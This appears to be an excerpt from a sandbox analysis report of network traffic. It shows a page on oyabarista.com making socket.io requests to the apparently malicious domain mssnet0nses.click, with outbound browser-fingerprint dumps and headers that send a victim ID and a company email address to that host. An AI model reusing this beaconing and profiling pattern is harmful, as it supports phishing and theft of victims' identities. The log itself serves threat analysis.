                                                        2025-03-27 13:41:46 UTC16384OUTData Raw: 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 61 70 74 69 6f 6e 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62
                                                        Data Ascii: 7D%22%2C%22HTMLTableColElement%22%3A%22function+HTMLTableColElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCellElement%22%3A%22function+HTMLTableCellElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCaptionElement%22%3A%22function+HTMLTab
                                                        2025-03-27 13:41:46 UTC16384OUTData Raw: 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 66 72 61 6d 65 73 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 66
                                                        Data Ascii: B+%5Bnative+code%5D+%7D%22%2C%22CSSLayerBlockRule%22%3A%22function+CSSLayerBlockRule%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeywordValue%22%3A%22function+CSSKeywordValue%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeyframesRule%22%3A%22function+CSSKeyf
                                                        2025-03-27 13:41:46 UTC16384OUTData Raw: 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 57 72 69 74 61 62 6c 65 46 69 6c 65 53 74
                                                        Data Ascii: %28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemFileHandle%22%3A%22function+FileSystemFileHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemHandle%22%3A%22function+FileSystemHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemWritableFileSt
                                                        2025-03-27 13:41:46 UTC16384OUTData Raw: 32 25 32 43 25 32 32 54 61 73 6b 53 69 67 6e 61 6c 25 32 32 25 32 43 25 32 32 54 61 73 6b 50 72 69 6f 72 69 74 79 43 68 61 6e 67 65 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 54 61 73 6b 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 32 43 25 32 32 54 61 73 6b 41 74 74 72 69 62 75 74 69 6f 6e 54 69 6d 69 6e 67 25 32 32 25 32 43 25 32 32 53 79 6e 63 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 53 75 62 6d 69 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 4c 69 73 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 52 65 61 64 4f 6e 6c 79 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 25 32 32 25 32 43 25 32 32 53 74 6f 72
                                                        Data Ascii: 2%2C%22TaskSignal%22%2C%22TaskPriorityChangeEvent%22%2C%22TaskController%22%2C%22TaskAttributionTiming%22%2C%22SyncManager%22%2C%22SubmitEvent%22%2C%22StyleSheetList%22%2C%22StyleSheet%22%2C%22StylePropertyMapReadOnly%22%2C%22StylePropertyMap%22%2C%22Stor
                                                        2025-03-27 13:41:46 UTC16384OUTData Raw: 32 63 6c 6f 73 65 25 32 32 25 32 43 25 32 32 63 6f 6e 66 69 72 6d 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 25 32 32 25 32 43 25 32 32 66 65 74 63 68 25 32 32 25 32 43 25 32 32 66 69 6e 64 25 32 32 25 32 43 25 32 32 66 6f 63 75 73 25 32 32 25 32 43 25 32 32 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 25 32 32 25 32 43 25 32 32 67 65 74 53 65 6c 65 63 74 69 6f 6e 25 32 32 25 32 43 25 32 32 6d 61 74 63 68 4d 65 64 69 61 25 32 32 25 32 43 25 32 32 6d 6f 76 65 42 79 25 32 32 25 32 43 25 32 32 6d 6f 76 65 54 6f 25 32 32 25 32 43 25 32 32 6f 70 65 6e 25 32 32 25 32 43 25 32 32 70 6f 73 74 4d 65 73 73 61 67 65 25 32 32 25 32 43 25 32 32 70 72 69 6e 74 25 32 32 25 32 43 25 32 32 70 72 6f 6d 70 74 25 32 32 25 32 43 25 32 32
                                                        Data Ascii: 2close%22%2C%22confirm%22%2C%22createImageBitmap%22%2C%22fetch%22%2C%22find%22%2C%22focus%22%2C%22getComputedStyle%22%2C%22getSelection%22%2C%22matchMedia%22%2C%22moveBy%22%2C%22moveTo%22%2C%22open%22%2C%22postMessage%22%2C%22print%22%2C%22prompt%22%2C%22
                                                        2025-03-27 13:41:46 UTC15956OUTData Raw: 53 74 61 6d 70 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 74 69 6d 65 53 74 61 6d 70 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 6f 6e 74 65 78 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 6f 6e 74 65 78 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 54 61 73 6b 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 54 61 73 6b 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6d 65 6d 6f 72 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 4d 65 6d 6f 72
                                                        Data Ascii: Stamp%22%3A%22function+timeStamp%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22context%22%3A%22function+context%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createTask%22%3A%22function+createTask%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22memory%22%3A%22%5Bobject+Memor


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.549786172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:46 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrbdU&sid=ceGoATplRk4sAOILAAe3 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:47 UTC835INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:47 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=smo%2F5ygmTfULf6o5Z69gnXOBJgqCfhpziQkj0cR9i%2F9l7nkXuA0t%2BuIeOwfpd7BhCyadYdEci73QmlVtf6Q4xfjpn9zh3yD%2FEU0QX2swT83mgOGF%2F9%2FXnqLJ5oi9LKbQiDVZeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ea98a80de9a-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83294&min_rtt=83262&rtt_var=17612&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1022&delivery_rate=36670&cwnd=252&unsent_bytes=0&cid=86136adf858c4f68&ts=258&x=0"
                                                        2025-03-27 13:41:47 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
                                                        Data Ascii: 29{"code":1,"message":"Session ID unknown"}
                                                        2025-03-27 13:41:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.549788172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:47 UTC567OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrcEg HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:47 UTC375INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:47 GMT
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4eadfa1a40ae-EWR
                                                        alt-svc: h3=":443"; ma=86400


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        36192.168.2.549789172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:48 UTC667OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrcEg HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:48 UTC849INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:48 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KoWDRA%2BgvsjWrqGIZQTViFDaks1EqF%2FWJ%2BAker9mPyowOu82ra01ReX4xOQLNgE8V39Lio2%2FtXxbzFWegHgz0mKw1hTZZuZ49BvoEcYoCiIm5sPaqfatUrKLrxxKjsvM30sIBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4eb0ed988c5f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84165&min_rtt=83941&rtt_var=17927&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1239&delivery_rate=36407&cwnd=245&unsent_bytes=0&cid=51ea2279b1bfeb1f&ts=334&x=0"
                                                        2025-03-27 13:41:48 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 74 30 31 30 48 79 35 6f 36 2d 44 72 63 4c 4d 79 41 41 65 38 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"t010Hy5o6-DrcLMyAAe8","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        37192.168.2.549791172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:48 UTC566OUTGET /socket.io/?EIO=4&transport=websocket&sid=t010Hy5o6-DrcLMyAAe8 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://www.oyabarista.com
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: 6rSjHvMBQUC+Jb69+3Yxqw==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2025-03-27 13:41:48 UTC833INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:48 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bqBAwxJeD6hp24I4cN%2FI30C4i09BacZmZpzocjrsYQR%2FERbwBkE%2FXAi3aF4RcgT1b66mDBGGdwNcf16WugFOu4opxKopnFH4rRGOkOcmHj3713PqhjDKpDnpfBIHhL%2B%2BrK3HuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4eb3faaedaac-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84941&min_rtt=84736&rtt_var=18053&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1121&delivery_rate=36045&cwnd=253&unsent_bytes=0&cid=c1a774c6845ba859&ts=313&x=0"
                                                        2025-03-27 13:41:48 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}
                                                        2025-03-27 13:41:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        38192.168.2.549792172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:48 UTC593OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrcTV&sid=t010Hy5o6-DrcLMyAAe8 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:48 UTC939INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:48 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BRjyLAlwmVuXbVtuVKRBqmb%2BN1r0dxraOI8gJIWclvUaegS1DKn1wtn0S3e7A%2BKyzyMpo2JE8HXXBcP3m2LH5s78Lbv4ueCMoJAKbAwRApdETYRYy8x7Qr5mAamcb761TpmkMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4eb3ff2f4332-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83798&min_rtt=83705&rtt_var=17727&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1165&delivery_rate=36496&cwnd=252&unsent_bytes=0&cid=16b714b84ad87f17&ts=308&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        39192.168.2.549793172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:48 UTC425OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrcEg HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:48 UTC850INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:48 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mEsJGeSSrhs%2BT%2B4MKAYA6W8iNVuxF%2FfNknJSJ0C4bmdC8RmHlq%2FS7asq4KUAENRbZKOsoiq9lVGuvixcevNjfkAMeLRmyFtuljuSqcZ4uMf1Zo7D8L%2BxxnOoxnvwrBA4ZI9CKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4eb3fa8ac52b-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84464&min_rtt=84338&rtt_var=17899&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=997&delivery_rate=36230&cwnd=252&unsent_bytes=0&cid=e160cb093b044945&ts=301&x=0"
                                                        2025-03-27 13:41:48 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 32 72 45 38 51 52 41 56 37 37 45 41 44 65 53 78 41 41 65 39 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"2rE8QRAV77EADeSxAAe9","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        40192.168.2.549790172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:48 UTC592OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrcTW&sid=t010Hy5o6-DrcLMyAAe8 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:48 UTC945INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:48 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gSJ8RIR9YHqgVsrQ27jOTVK%2Bvw2a%2Fhfp2lyTwb%2BiuOAA2Nfir0b%2BXkgo0R5vzmm5DCkdh4KmvIUzTF1OnHI6mBR6AhYJFmKQ36NlN7Sf4HDDqNZZZb%2FnoPFxiLMWJ2KZa4J9Mw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4eb3fe6a80d6-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83868&min_rtt=83646&rtt_var=17788&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1164&delivery_rate=36485&cwnd=252&unsent_bytes=0&cid=6455ba1460a42788&ts=328&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        41192.168.2.549794172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:49 UTC752OUTPOST /socket.io/?EIO=4&transport=polling&t=PNNrcTV&sid=t010Hy5o6-DrcLMyAAe8 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Content-Length: 2
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Content-type: text/plain;charset=UTF-8
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:49 UTC2OUTData Raw: 34 30
                                                        Data Ascii: 40
                                                        2025-03-27 13:41:49 UTC836INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:49 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TygiMU8iWjURome1XjD%2FPdnnMjNzRKSRd4SFR1U6onQtRRYBP4R9xI6EAx3vEzc9WdYMv0yJdW51bpM%2BMGLaQC3It6Pxa7NlFCcPwWkIFU66fpN8POk2HVw90Zj1huXelE856w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4eb6ecbccdf0-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83812&min_rtt=83775&rtt_var=17687&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1348&delivery_rate=36472&cwnd=252&unsent_bytes=0&cid=8b596bea33e95132&ts=308&x=0"
                                                        2025-03-27 13:41:49 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                        Data Ascii: 2ok
                                                        2025-03-27 13:41:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        42192.168.2.549795172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:49 UTC692OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrcTW&sid=t010Hy5o6-DrcLMyAAe8 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
